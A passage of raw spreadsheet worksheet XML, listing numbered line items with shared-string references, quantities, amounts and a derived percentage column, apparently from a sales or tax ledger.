      <c r="K2650" s="16"/>
    </row>
    <row r="2651" spans="2:11">
      <c r="B2651" s="9">
        <v>2685</v>
      </c>
      <c r="C2651" s="238" t="s">
        <v>12141</v>
      </c>
      <c r="D2651" s="238" t="s">
        <v>4890</v>
      </c>
      <c r="E2651" s="238" t="s">
        <v>12139</v>
      </c>
      <c r="F2651" s="238" t="s">
        <v>5789</v>
      </c>
      <c r="G2651" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2651" s="10">
        <v>1</v>
      </c>
      <c r="I2651" s="14">
        <v>641.02</v>
      </c>
      <c r="J2651" s="15">
        <v>102.5632</v>
      </c>
      <c r="K2651" s="16"/>
    </row>
    <row r="2652" spans="2:11">
      <c r="B2652" s="9">
        <v>2686</v>
      </c>
      <c r="C2652" s="238" t="s">
        <v>12142</v>
      </c>
      <c r="D2652" s="238" t="s">
        <v>12143</v>
      </c>
      <c r="E2652" s="238" t="s">
        <v>12139</v>
      </c>
      <c r="F2652" s="238" t="s">
        <v>12144</v>
      </c>
      <c r="G2652" s="237" t="s">
        <v>3776</v>
      </c>
      <c r="H2652" s="10">
        <v>4</v>
      </c>
      <c r="I2652" s="14">
        <v>2686.69</v>
      </c>
      <c r="J2652" s="15">
        <v>429.8688</v>
      </c>
      <c r="K2652" s="16"/>
    </row>
    <row r="2653" spans="2:11">
      <c r="B2653" s="9">
        <v>2687</v>
      </c>
      <c r="C2653" s="238" t="s">
        <v>12145</v>
      </c>
      <c r="D2653" s="238" t="s">
        <v>12146</v>
      </c>
      <c r="E2653" s="238" t="s">
        <v>12147</v>
      </c>
      <c r="F2653" s="9"/>
      <c r="G2653" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2653" s="10">
        <v>88</v>
      </c>
      <c r="I2653" s="14">
        <v>33520.07</v>
      </c>
      <c r="J2653" s="15">
        <v>5363.2128</v>
      </c>
      <c r="K2653" s="16"/>
    </row>
    <row r="2654" spans="2:11">
      <c r="B2654" s="9">
        <v>2688</v>
      </c>
      <c r="C2654" s="238" t="s">
        <v>12148</v>
      </c>
      <c r="D2654" s="238" t="s">
        <v>12149</v>
      </c>
      <c r="E2654" s="238" t="s">
        <v>12150</v>
      </c>
      <c r="F2654" s="238" t="s">
        <v>12151</v>
      </c>
      <c r="G2654" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H2654" s="10">
        <v>180</v>
      </c>
      <c r="I2654" s="14">
        <v>10444.55</v>
      </c>
      <c r="J2654" s="15">
        <v>1671.264</v>
      </c>
      <c r="K2654" s="16"/>
    </row>
    <row r="2655" spans="2:11">
      <c r="B2655" s="9">
        <v>2689</v>
      </c>
      <c r="C2655" s="238" t="s">
        <v>12152</v>
      </c>
      <c r="D2655" s="238" t="s">
        <v>4908</v>
      </c>
      <c r="E2655" s="238" t="s">
        <v>12153</v>
      </c>
      <c r="F2655" s="238" t="s">
        <v>12154</v>
      </c>
      <c r="G2655" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2655" s="10">
        <v>73</v>
      </c>
      <c r="I2655" s="14">
        <v>262.04</v>
      </c>
      <c r="J2655" s="15">
        <v>41.9312</v>
      </c>
      <c r="K2655" s="16"/>
    </row>
    <row r="2656" spans="2:11">
      <c r="B2656" s="9">
        <v>2690</v>
      </c>
      <c r="C2656" s="238" t="s">
        <v>12155</v>
      </c>
      <c r="D2656" s="238" t="s">
        <v>12156</v>
      </c>
      <c r="E2656" s="238" t="s">
        <v>6462</v>
      </c>
      <c r="F2656" s="238" t="s">
        <v>12157</v>
      </c>
      <c r="G2656" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2656" s="10">
        <v>2</v>
      </c>
      <c r="I2656" s="14">
        <v>401.71</v>
      </c>
      <c r="J2656" s="15">
        <v>64.2752</v>
      </c>
      <c r="K2656" s="16"/>
    </row>
    <row r="2657" spans="2:11">
      <c r="B2657" s="9">
        <v>2691</v>
      </c>
      <c r="C2657" s="238" t="s">
        <v>12158</v>
      </c>
      <c r="D2657" s="238" t="s">
        <v>6461</v>
      </c>
      <c r="E2657" s="238" t="s">
        <v>6462</v>
      </c>
      <c r="F2657" s="238" t="s">
        <v>12159</v>
      </c>
      <c r="G2657" s="237" t="s">
        <v>461</v>
      </c>
      <c r="H2657" s="10">
        <v>2</v>
      </c>
      <c r="I2657" s="14">
        <v>264.96</v>
      </c>
      <c r="J2657" s="15">
        <v>42.3936</v>
      </c>
      <c r="K2657" s="16"/>
    </row>
    <row r="2658" spans="2:11">
      <c r="B2658" s="9">
        <v>2692</v>
      </c>
      <c r="C2658" s="238" t="s">
        <v>12160</v>
      </c>
      <c r="D2658" s="238" t="s">
        <v>6049</v>
      </c>
      <c r="E2658" s="238" t="s">
        <v>12161</v>
      </c>
      <c r="F2658" s="238" t="s">
        <v>12162</v>
      </c>
      <c r="G2658" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2658" s="10">
        <v>4</v>
      </c>
      <c r="I2658" s="14">
        <v>126.68</v>
      </c>
      <c r="J2658" s="15">
        <v>20.2688</v>
      </c>
      <c r="K2658" s="16"/>
    </row>
    <row r="2659" spans="2:11">
      <c r="B2659" s="9">
        <v>2693</v>
      </c>
      <c r="C2659" s="238" t="s">
        <v>12163</v>
      </c>
      <c r="D2659" s="238" t="s">
        <v>12164</v>
      </c>
      <c r="E2659" s="238" t="s">
        <v>12165</v>
      </c>
      <c r="F2659" s="9"/>
      <c r="G2659" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2659" s="10">
        <v>64</v>
      </c>
      <c r="I2659" s="14">
        <v>8283.62</v>
      </c>
      <c r="J2659" s="15">
        <v>1325.3632</v>
      </c>
      <c r="K2659" s="16"/>
    </row>
    <row r="2660" spans="2:11">
      <c r="B2660" s="9">
        <v>2694</v>
      </c>
      <c r="C2660" s="238" t="s">
        <v>12166</v>
      </c>
      <c r="D2660" s="238" t="s">
        <v>6914</v>
      </c>
      <c r="E2660" s="238" t="s">
        <v>6915</v>
      </c>
      <c r="F2660" s="238" t="s">
        <v>12167</v>
      </c>
      <c r="G2660" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2660" s="10">
        <v>1</v>
      </c>
      <c r="I2660" s="14">
        <v>72.65</v>
      </c>
      <c r="J2660" s="15">
        <v>11.624</v>
      </c>
      <c r="K2660" s="16"/>
    </row>
    <row r="2661" spans="2:11">
      <c r="B2661" s="9">
        <v>2695</v>
      </c>
      <c r="C2661" s="238" t="s">
        <v>12168</v>
      </c>
      <c r="D2661" s="238" t="s">
        <v>12169</v>
      </c>
      <c r="E2661" s="238" t="s">
        <v>12170</v>
      </c>
      <c r="F2661" s="238" t="s">
        <v>12171</v>
      </c>
      <c r="G2661" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2661" s="10">
        <v>5</v>
      </c>
      <c r="I2661" s="14">
        <v>3179.49</v>
      </c>
      <c r="J2661" s="15">
        <v>508.72</v>
      </c>
      <c r="K2661" s="16"/>
    </row>
    <row r="2662" spans="2:11">
      <c r="B2662" s="9">
        <v>2696</v>
      </c>
      <c r="C2662" s="238" t="s">
        <v>12172</v>
      </c>
      <c r="D2662" s="238" t="s">
        <v>4890</v>
      </c>
      <c r="E2662" s="238" t="s">
        <v>12139</v>
      </c>
      <c r="F2662" s="238" t="s">
        <v>708</v>
      </c>
      <c r="G2662" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2662" s="10">
        <v>5</v>
      </c>
      <c r="I2662" s="14">
        <v>4268.74</v>
      </c>
      <c r="J2662" s="15">
        <v>683</v>
      </c>
      <c r="K2662" s="16"/>
    </row>
    <row r="2663" spans="2:11">
      <c r="B2663" s="9">
        <v>2697</v>
      </c>
      <c r="C2663" s="238" t="s">
        <v>12173</v>
      </c>
      <c r="D2663" s="238" t="s">
        <v>12174</v>
      </c>
      <c r="E2663" s="238" t="s">
        <v>12139</v>
      </c>
      <c r="F2663" s="238" t="s">
        <v>3184</v>
      </c>
      <c r="G2663" s="237" t="s">
        <v>3776</v>
      </c>
      <c r="H2663" s="10">
        <v>2</v>
      </c>
      <c r="I2663" s="14">
        <v>1880.34</v>
      </c>
      <c r="J2663" s="15">
        <v>300.8544</v>
      </c>
      <c r="K2663" s="16"/>
    </row>
    <row r="2664" spans="2:11">
      <c r="B2664" s="9">
        <v>2698</v>
      </c>
      <c r="C2664" s="238" t="s">
        <v>12175</v>
      </c>
      <c r="D2664" s="238" t="s">
        <v>12176</v>
      </c>
      <c r="E2664" s="238" t="s">
        <v>12177</v>
      </c>
      <c r="F2664" s="238" t="s">
        <v>12178</v>
      </c>
      <c r="G2664" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2664" s="10">
        <v>1</v>
      </c>
      <c r="I2664" s="14">
        <v>358.97</v>
      </c>
      <c r="J2664" s="15">
        <v>57.4352</v>
      </c>
      <c r="K2664" s="16"/>
    </row>
    <row r="2665" spans="2:11">
      <c r="B2665" s="9">
        <v>2699</v>
      </c>
      <c r="C2665" s="238" t="s">
        <v>12179</v>
      </c>
      <c r="D2665" s="238" t="s">
        <v>12180</v>
      </c>
      <c r="E2665" s="238" t="s">
        <v>12177</v>
      </c>
      <c r="F2665" s="238" t="s">
        <v>12181</v>
      </c>
      <c r="G2665" s="237" t="s">
        <v>4760</v>
      </c>
      <c r="H2665" s="10">
        <v>3</v>
      </c>
      <c r="I2665" s="14">
        <v>1075.1</v>
      </c>
      <c r="J2665" s="15">
        <v>172.0176</v>
      </c>
      <c r="K2665" s="16"/>
    </row>
    <row r="2666" spans="2:11">
      <c r="B2666" s="9">
        <v>2700</v>
      </c>
      <c r="C2666" s="238" t="s">
        <v>12182</v>
      </c>
      <c r="D2666" s="238" t="s">
        <v>12183</v>
      </c>
      <c r="E2666" s="238" t="s">
        <v>12184</v>
      </c>
      <c r="F2666" s="238" t="s">
        <v>12185</v>
      </c>
      <c r="G2666" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2666" s="10">
        <v>3</v>
      </c>
      <c r="I2666" s="14">
        <v>269.23</v>
      </c>
      <c r="J2666" s="15">
        <v>43.0752</v>
      </c>
      <c r="K2666" s="16"/>
    </row>
    <row r="2667" spans="2:11">
      <c r="B2667" s="9">
        <v>2701</v>
      </c>
      <c r="C2667" s="238" t="s">
        <v>12186</v>
      </c>
      <c r="D2667" s="238" t="s">
        <v>5665</v>
      </c>
      <c r="E2667" s="238" t="s">
        <v>5666</v>
      </c>
      <c r="F2667" s="238" t="s">
        <v>12187</v>
      </c>
      <c r="G2667" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2667" s="10">
        <v>3</v>
      </c>
      <c r="I2667" s="14">
        <v>217.95</v>
      </c>
      <c r="J2667" s="15">
        <v>34.872</v>
      </c>
      <c r="K2667" s="16"/>
    </row>
    <row r="2668" spans="2:11">
      <c r="B2668" s="9">
        <v>2702</v>
      </c>
      <c r="C2668" s="238" t="s">
        <v>12188</v>
      </c>
      <c r="D2668" s="238" t="s">
        <v>12189</v>
      </c>
      <c r="E2668" s="238" t="s">
        <v>12190</v>
      </c>
      <c r="F2668" s="9"/>
      <c r="G2668" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2668" s="10">
        <v>3</v>
      </c>
      <c r="I2668" s="14">
        <v>741.56</v>
      </c>
      <c r="J2668" s="15">
        <v>118.6512</v>
      </c>
      <c r="K2668" s="16"/>
    </row>
    <row r="2669" spans="2:11">
      <c r="B2669" s="9">
        <v>2703</v>
      </c>
      <c r="C2669" s="238" t="s">
        <v>12191</v>
      </c>
      <c r="D2669" s="238" t="s">
        <v>12192</v>
      </c>
      <c r="E2669" s="238" t="s">
        <v>12193</v>
      </c>
      <c r="F2669" s="238" t="s">
        <v>12194</v>
      </c>
      <c r="G2669" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2669" s="10">
        <v>7</v>
      </c>
      <c r="I2669" s="14">
        <v>299.13</v>
      </c>
      <c r="J2669" s="15">
        <v>47.8576</v>
      </c>
      <c r="K2669" s="16"/>
    </row>
    <row r="2670" spans="2:11">
      <c r="B2670" s="9">
        <v>2704</v>
      </c>
      <c r="C2670" s="238" t="s">
        <v>12195</v>
      </c>
      <c r="D2670" s="238" t="s">
        <v>12196</v>
      </c>
      <c r="E2670" s="238" t="s">
        <v>12197</v>
      </c>
      <c r="F2670" s="238" t="s">
        <v>12198</v>
      </c>
      <c r="G2670" s="237" t="s">
        <v>2125</v>
      </c>
      <c r="H2670" s="10">
        <v>1</v>
      </c>
      <c r="I2670" s="14">
        <v>128.21</v>
      </c>
      <c r="J2670" s="15">
        <v>20.5136</v>
      </c>
      <c r="K2670" s="16"/>
    </row>
    <row r="2671" spans="2:11">
      <c r="B2671" s="9">
        <v>2705</v>
      </c>
      <c r="C2671" s="238" t="s">
        <v>12199</v>
      </c>
      <c r="D2671" s="238" t="s">
        <v>12200</v>
      </c>
      <c r="E2671" s="238" t="s">
        <v>12201</v>
      </c>
      <c r="F2671" s="238" t="s">
        <v>12202</v>
      </c>
      <c r="G2671" s="237" t="s">
        <v>461</v>
      </c>
      <c r="H2671" s="10">
        <v>43</v>
      </c>
      <c r="I2671" s="14">
        <v>35848.51</v>
      </c>
      <c r="J2671" s="15">
        <v>5735.7872</v>
      </c>
      <c r="K2671" s="16"/>
    </row>
    <row r="2672" spans="2:11">
      <c r="B2672" s="9">
        <v>2706</v>
      </c>
      <c r="C2672" s="238" t="s">
        <v>12203</v>
      </c>
      <c r="D2672" s="238" t="s">
        <v>12204</v>
      </c>
      <c r="E2672" s="238" t="s">
        <v>12205</v>
      </c>
      <c r="F2672" s="238" t="s">
        <v>12206</v>
      </c>
      <c r="G2672" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2672" s="10">
        <v>1700</v>
      </c>
      <c r="I2672" s="14">
        <v>27820.51</v>
      </c>
      <c r="J2672" s="15">
        <v>0</v>
      </c>
      <c r="K2672" s="16" t="s">
        <v>5140</v>
      </c>
    </row>
    <row r="2673" spans="2:11">
      <c r="B2673" s="9">
        <v>2707</v>
      </c>
      <c r="C2673" s="238" t="s">
        <v>12207</v>
      </c>
      <c r="D2673" s="238" t="s">
        <v>12208</v>
      </c>
      <c r="E2673" s="238" t="s">
        <v>12209</v>
      </c>
      <c r="F2673" s="238" t="s">
        <v>12210</v>
      </c>
      <c r="G2673" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2673" s="10">
        <v>2</v>
      </c>
      <c r="I2673" s="14">
        <v>991.45</v>
      </c>
      <c r="J2673" s="15">
        <v>158.6336</v>
      </c>
      <c r="K2673" s="16"/>
    </row>
    <row r="2674" spans="2:11">
      <c r="B2674" s="9">
        <v>2708</v>
      </c>
      <c r="C2674" s="238" t="s">
        <v>12211</v>
      </c>
      <c r="D2674" s="9" t="s">
        <v>12212</v>
      </c>
      <c r="E2674" s="238" t="s">
        <v>12213</v>
      </c>
      <c r="F2674" s="238" t="s">
        <v>12214</v>
      </c>
      <c r="G2674" s="237" t="s">
        <v>223</v>
      </c>
      <c r="H2674" s="10">
        <v>1</v>
      </c>
      <c r="I2674" s="14">
        <v>6410.26</v>
      </c>
      <c r="J2674" s="15">
        <v>1025.6416</v>
      </c>
      <c r="K2674" s="16"/>
    </row>
    <row r="2675" spans="2:11">
      <c r="B2675" s="9">
        <v>2709</v>
      </c>
      <c r="C2675" s="238" t="s">
        <v>12215</v>
      </c>
      <c r="D2675" s="238" t="s">
        <v>12216</v>
      </c>
      <c r="E2675" s="238" t="s">
        <v>12217</v>
      </c>
      <c r="F2675" s="9"/>
      <c r="G2675" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2675" s="10">
        <v>300</v>
      </c>
      <c r="I2675" s="14">
        <v>2464.88</v>
      </c>
      <c r="J2675" s="15">
        <v>394.56</v>
      </c>
      <c r="K2675" s="16"/>
    </row>
    <row r="2676" spans="2:11">
      <c r="B2676" s="9">
        <v>2710</v>
      </c>
      <c r="C2676" s="238" t="s">
        <v>12218</v>
      </c>
      <c r="D2676" s="238" t="s">
        <v>4712</v>
      </c>
      <c r="E2676" s="238" t="s">
        <v>9275</v>
      </c>
      <c r="F2676" s="238" t="s">
        <v>6256</v>
      </c>
      <c r="G2676" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2676" s="10">
        <v>15</v>
      </c>
      <c r="I2676" s="14">
        <v>211.54</v>
      </c>
      <c r="J2676" s="15">
        <v>33.84</v>
      </c>
      <c r="K2676" s="16"/>
    </row>
    <row r="2677" spans="2:11">
      <c r="B2677" s="9">
        <v>2711</v>
      </c>
      <c r="C2677" s="238" t="s">
        <v>12219</v>
      </c>
      <c r="D2677" s="238" t="s">
        <v>12220</v>
      </c>
      <c r="E2677" s="238" t="s">
        <v>12221</v>
      </c>
      <c r="F2677" s="9"/>
      <c r="G2677" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H2677" s="10">
        <v>24</v>
      </c>
      <c r="I2677" s="14">
        <v>5760</v>
      </c>
      <c r="J2677" s="15">
        <v>921.6</v>
      </c>
      <c r="K2677" s="16"/>
    </row>
    <row r="2678" spans="2:11">
      <c r="B2678" s="9">
        <v>2712</v>
      </c>
      <c r="C2678" s="238" t="s">
        <v>12222</v>
      </c>
      <c r="D2678" s="238" t="s">
        <v>12223</v>
      </c>
      <c r="E2678" s="238" t="s">
        <v>12224</v>
      </c>
      <c r="F2678" s="9"/>
      <c r="G2678" s="237" t="s">
        <v>3484</v>
      </c>
      <c r="H2678" s="10">
        <v>24</v>
      </c>
      <c r="I2678" s="14">
        <v>276</v>
      </c>
      <c r="J2678" s="15">
        <v>44.16</v>
      </c>
      <c r="K2678" s="16"/>
    </row>
    <row r="2679" spans="2:11">
      <c r="B2679" s="9">
        <v>2713</v>
      </c>
      <c r="C2679" s="238" t="s">
        <v>12225</v>
      </c>
      <c r="D2679" s="238" t="s">
        <v>12226</v>
      </c>
      <c r="E2679" s="238" t="s">
        <v>12227</v>
      </c>
      <c r="F2679" s="238" t="s">
        <v>12228</v>
      </c>
      <c r="G2679" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2679" s="10">
        <v>1</v>
      </c>
      <c r="I2679" s="14">
        <v>4700.85</v>
      </c>
      <c r="J2679" s="15">
        <v>752.136</v>
      </c>
      <c r="K2679" s="16"/>
    </row>
    <row r="2680" spans="2:11">
      <c r="B2680" s="9">
        <v>2714</v>
      </c>
      <c r="C2680" s="238" t="s">
        <v>12229</v>
      </c>
      <c r="D2680" s="238" t="s">
        <v>12230</v>
      </c>
      <c r="E2680" s="238" t="s">
        <v>12231</v>
      </c>
      <c r="F2680" s="238" t="s">
        <v>12232</v>
      </c>
      <c r="G2680" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2680" s="10">
        <v>4</v>
      </c>
      <c r="I2680" s="14">
        <v>256.41</v>
      </c>
      <c r="J2680" s="15">
        <v>41.024</v>
      </c>
      <c r="K2680" s="16"/>
    </row>
    <row r="2681" spans="2:11">
      <c r="B2681" s="9">
        <v>2715</v>
      </c>
      <c r="C2681" s="238" t="s">
        <v>12233</v>
      </c>
      <c r="D2681" s="238" t="s">
        <v>12234</v>
      </c>
      <c r="E2681" s="238" t="s">
        <v>12235</v>
      </c>
      <c r="F2681" s="238" t="s">
        <v>1288</v>
      </c>
      <c r="G2681" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H2681" s="10">
        <v>50</v>
      </c>
      <c r="I2681" s="14">
        <v>1965.81</v>
      </c>
      <c r="J2681" s="15">
        <v>314.56</v>
      </c>
      <c r="K2681" s="16"/>
    </row>
    <row r="2682" spans="2:11">
      <c r="B2682" s="9">
        <v>2716</v>
      </c>
      <c r="C2682" s="238" t="s">
        <v>12236</v>
      </c>
      <c r="D2682" s="238" t="s">
        <v>12237</v>
      </c>
      <c r="E2682" s="238" t="s">
        <v>5192</v>
      </c>
      <c r="F2682" s="238" t="s">
        <v>12238</v>
      </c>
      <c r="G2682" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2682" s="10">
        <v>20</v>
      </c>
      <c r="I2682" s="14">
        <v>17.09</v>
      </c>
      <c r="J2682" s="15">
        <v>2.72</v>
      </c>
      <c r="K2682" s="16"/>
    </row>
    <row r="2683" spans="2:11">
      <c r="B2683" s="9">
        <v>2717</v>
      </c>
      <c r="C2683" s="238" t="s">
        <v>12239</v>
      </c>
      <c r="D2683" s="238" t="s">
        <v>4718</v>
      </c>
      <c r="E2683" s="238" t="s">
        <v>4719</v>
      </c>
      <c r="F2683" s="238" t="s">
        <v>1288</v>
      </c>
      <c r="G2683" s="237" t="s">
        <v>461</v>
      </c>
      <c r="H2683" s="10">
        <v>9</v>
      </c>
      <c r="I2683" s="14">
        <v>821.39</v>
      </c>
      <c r="J2683" s="15">
        <v>131.4288</v>
      </c>
      <c r="K2683" s="16"/>
    </row>
    <row r="2684" spans="2:11">
      <c r="B2684" s="9">
        <v>2718</v>
      </c>
      <c r="C2684" s="238" t="s">
        <v>12240</v>
      </c>
      <c r="D2684" s="238" t="s">
        <v>12241</v>
      </c>
      <c r="E2684" s="238" t="s">
        <v>8626</v>
      </c>
      <c r="F2684" s="238" t="s">
        <v>1288</v>
      </c>
      <c r="G2684" s="237" t="s">
        <v>461</v>
      </c>
      <c r="H2684" s="10">
        <v>1</v>
      </c>
      <c r="I2684" s="14">
        <v>811.97</v>
      </c>
      <c r="J2684" s="15">
        <v>129.9152</v>
      </c>
      <c r="K2684" s="16"/>
    </row>
    <row r="2685" spans="2:11">
      <c r="B2685" s="9">
        <v>2719</v>
      </c>
      <c r="C2685" s="238" t="s">
        <v>12242</v>
      </c>
      <c r="D2685" s="238" t="s">
        <v>12243</v>
      </c>
      <c r="E2685" s="238" t="s">
        <v>3200</v>
      </c>
      <c r="F2685" s="238" t="s">
        <v>12244</v>
      </c>
      <c r="G2685" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H2685" s="10">
        <v>17</v>
      </c>
      <c r="I2685" s="14">
        <v>47948.72</v>
      </c>
      <c r="J2685" s="15">
        <v>0</v>
      </c>
      <c r="K2685" s="16" t="s">
        <v>5140</v>
      </c>
    </row>
    <row r="2686" spans="2:11">
      <c r="B2686" s="9">
        <v>2720</v>
      </c>
      <c r="C2686" s="238" t="s">
        <v>12245</v>
      </c>
      <c r="D2686" s="238" t="s">
        <v>12246</v>
      </c>
      <c r="E2686" s="238" t="s">
        <v>12247</v>
      </c>
      <c r="F2686" s="9"/>
      <c r="G2686" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2686" s="10">
        <v>150</v>
      </c>
      <c r="I2686" s="14">
        <v>1025.64</v>
      </c>
      <c r="J2686" s="15">
        <v>164.16</v>
      </c>
      <c r="K2686" s="16"/>
    </row>
    <row r="2687" spans="2:11">
      <c r="B2687" s="9">
        <v>2721</v>
      </c>
      <c r="C2687" s="238" t="s">
        <v>12248</v>
      </c>
      <c r="D2687" s="238" t="s">
        <v>5127</v>
      </c>
      <c r="E2687" s="238" t="s">
        <v>6746</v>
      </c>
      <c r="F2687" s="238" t="s">
        <v>1288</v>
      </c>
      <c r="G2687" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H2687" s="10">
        <v>1</v>
      </c>
      <c r="I2687" s="14">
        <v>401.71</v>
      </c>
      <c r="J2687" s="15">
        <v>64.2736</v>
      </c>
      <c r="K2687" s="16"/>
    </row>
    <row r="2688" spans="2:11">
      <c r="B2688" s="9">
        <v>2722</v>
      </c>
      <c r="C2688" s="238" t="s">
        <v>12249</v>
      </c>
      <c r="D2688" s="238" t="s">
        <v>12250</v>
      </c>
      <c r="E2688" s="238" t="s">
        <v>12251</v>
      </c>
      <c r="F2688" s="238" t="s">
        <v>12252</v>
      </c>
      <c r="G2688" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2688" s="10">
        <v>1</v>
      </c>
      <c r="I2688" s="14">
        <v>615</v>
      </c>
      <c r="J2688" s="15">
        <v>98.4</v>
      </c>
      <c r="K2688" s="16"/>
    </row>
    <row r="2689" spans="2:11">
      <c r="B2689" s="9">
        <v>2723</v>
      </c>
      <c r="C2689" s="238" t="s">
        <v>12253</v>
      </c>
      <c r="D2689" s="238" t="s">
        <v>12254</v>
      </c>
      <c r="E2689" s="238" t="s">
        <v>12255</v>
      </c>
      <c r="F2689" s="238" t="s">
        <v>1288</v>
      </c>
      <c r="G2689" s="237" t="s">
        <v>5339</v>
      </c>
      <c r="H2689" s="10">
        <v>13</v>
      </c>
      <c r="I2689" s="14">
        <v>26190.48</v>
      </c>
      <c r="J2689" s="15">
        <v>4190.472</v>
      </c>
      <c r="K2689" s="16"/>
    </row>
    <row r="2690" spans="2:11">
      <c r="B2690" s="9">
        <v>2724</v>
      </c>
      <c r="C2690" s="238" t="s">
        <v>12256</v>
      </c>
      <c r="D2690" s="238" t="s">
        <v>5142</v>
      </c>
      <c r="E2690" s="238" t="s">
        <v>12257</v>
      </c>
      <c r="F2690" s="238" t="s">
        <v>12258</v>
      </c>
      <c r="G2690" s="237" t="s">
        <v>3484</v>
      </c>
      <c r="H2690" s="10">
        <v>1</v>
      </c>
      <c r="I2690" s="14">
        <v>2413.68</v>
      </c>
      <c r="J2690" s="15">
        <v>386.1888</v>
      </c>
      <c r="K2690" s="16"/>
    </row>
    <row r="2691" spans="2:11">
      <c r="B2691" s="9">
        <v>2725</v>
      </c>
      <c r="C2691" s="238" t="s">
        <v>12259</v>
      </c>
      <c r="D2691" s="238" t="s">
        <v>12260</v>
      </c>
      <c r="E2691" s="238" t="s">
        <v>11131</v>
      </c>
      <c r="F2691" s="238" t="s">
        <v>12261</v>
      </c>
      <c r="G2691" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2691" s="10">
        <v>1</v>
      </c>
      <c r="I2691" s="14">
        <v>22.66</v>
      </c>
      <c r="J2691" s="15">
        <v>3.6256</v>
      </c>
      <c r="K2691" s="16"/>
    </row>
    <row r="2692" spans="2:11">
      <c r="B2692" s="9">
        <v>2726</v>
      </c>
      <c r="C2692" s="238" t="s">
        <v>12262</v>
      </c>
      <c r="D2692" s="238" t="s">
        <v>12263</v>
      </c>
      <c r="E2692" s="238" t="s">
        <v>12264</v>
      </c>
      <c r="F2692" s="238" t="s">
        <v>1288</v>
      </c>
      <c r="G2692" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2692" s="10">
        <v>2</v>
      </c>
      <c r="I2692" s="14">
        <v>150.43</v>
      </c>
      <c r="J2692" s="15">
        <v>24.0704</v>
      </c>
      <c r="K2692" s="16"/>
    </row>
    <row r="2693" spans="2:11">
      <c r="B2693" s="9">
        <v>2727</v>
      </c>
      <c r="C2693" s="238" t="s">
        <v>12265</v>
      </c>
      <c r="D2693" s="238" t="s">
        <v>12266</v>
      </c>
      <c r="E2693" s="238" t="s">
        <v>12267</v>
      </c>
      <c r="F2693" s="9"/>
      <c r="G2693" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2693" s="10">
        <v>1</v>
      </c>
      <c r="I2693" s="14">
        <v>226.5</v>
      </c>
      <c r="J2693" s="15">
        <v>36.24</v>
      </c>
      <c r="K2693" s="16"/>
    </row>
    <row r="2694" spans="2:11">
      <c r="B2694" s="9">
        <v>2728</v>
      </c>
      <c r="C2694" s="238" t="s">
        <v>12268</v>
      </c>
      <c r="D2694" s="238" t="s">
        <v>5127</v>
      </c>
      <c r="E2694" s="238" t="s">
        <v>4837</v>
      </c>
      <c r="F2694" s="238" t="s">
        <v>12269</v>
      </c>
      <c r="G2694" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H2694" s="10">
        <v>4</v>
      </c>
      <c r="I2694" s="14">
        <v>2478.63</v>
      </c>
      <c r="J2694" s="15">
        <v>396.5824</v>
      </c>
      <c r="K2694" s="16"/>
    </row>
    <row r="2695" spans="2:11">
      <c r="B2695" s="9">
        <v>2729</v>
      </c>
      <c r="C2695" s="238" t="s">
        <v>12270</v>
      </c>
      <c r="D2695" s="238" t="s">
        <v>4911</v>
      </c>
      <c r="E2695" s="238" t="s">
        <v>12271</v>
      </c>
      <c r="F2695" s="238" t="s">
        <v>12272</v>
      </c>
      <c r="G2695" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2695" s="10">
        <v>30</v>
      </c>
      <c r="I2695" s="14">
        <v>641.03</v>
      </c>
      <c r="J2695" s="15">
        <v>102.576</v>
      </c>
      <c r="K2695" s="16"/>
    </row>
    <row r="2696" spans="2:11">
      <c r="B2696" s="9">
        <v>2730</v>
      </c>
      <c r="C2696" s="238" t="s">
        <v>12273</v>
      </c>
      <c r="D2696" s="238" t="s">
        <v>4712</v>
      </c>
      <c r="E2696" s="238" t="s">
        <v>9275</v>
      </c>
      <c r="F2696" s="9"/>
      <c r="G2696" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2696" s="10">
        <v>20</v>
      </c>
      <c r="I2696" s="14">
        <v>158.97</v>
      </c>
      <c r="J2696" s="15">
        <v>25.44</v>
      </c>
      <c r="K2696" s="16"/>
    </row>
    <row r="2697" spans="2:11">
      <c r="B2697" s="9">
        <v>2731</v>
      </c>
      <c r="C2697" s="238" t="s">
        <v>12274</v>
      </c>
      <c r="D2697" s="238" t="s">
        <v>12275</v>
      </c>
      <c r="E2697" s="238" t="s">
        <v>12276</v>
      </c>
      <c r="F2697" s="238" t="s">
        <v>12277</v>
      </c>
      <c r="G2697" s="237" t="s">
        <v>223</v>
      </c>
      <c r="H2697" s="10">
        <v>3</v>
      </c>
      <c r="I2697" s="14">
        <v>3025.64</v>
      </c>
      <c r="J2697" s="15">
        <v>484.104</v>
      </c>
      <c r="K2697" s="16"/>
    </row>
    <row r="2698" spans="2:11">
      <c r="B2698" s="9">
        <v>2732</v>
      </c>
      <c r="C2698" s="238" t="s">
        <v>12278</v>
      </c>
      <c r="D2698" s="238" t="s">
